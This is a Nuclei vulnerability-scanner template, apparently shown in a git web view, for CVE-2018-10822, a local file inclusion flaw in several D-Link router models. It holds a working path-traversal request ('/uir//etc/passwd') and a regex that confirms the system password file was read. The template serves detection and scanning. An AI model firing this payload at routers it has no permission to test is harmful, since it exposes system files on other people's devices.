nuclei-templates/cves/2018/CVE-2018-10822.yaml

37 lines
1.1 KiB
YAML
Raw Normal View History

2021-07-24 22:49:24 +00:00
id: CVE-2018-10822
info:
name: D-Link Routers - Local File Inclusion
2021-07-24 22:49:24 +00:00
author: daffainfo
2021-07-25 19:34:31 +00:00
severity: high
description: D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after "GET /uir" in an HTTP request to the web interface.
reference:
2021-07-24 22:49:24 +00:00
- https://www.exploit-db.com/exploits/45678
- http://sploit.tech/2018/10/12/D-Link.html
- https://nvd.nist.gov/vuln/detail/CVE-2018-10822
- https://seclists.org/fulldisclosure/2018/Oct/36
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-10822
cwe-id: CWE-22
tags: cve,cve2018,lfi,router,dlink
2021-07-24 22:49:24 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/uir//etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
2021-07-24 22:49:24 +00:00
- type: status
status:
- 200
# Enhanced by mp on 2022/06/19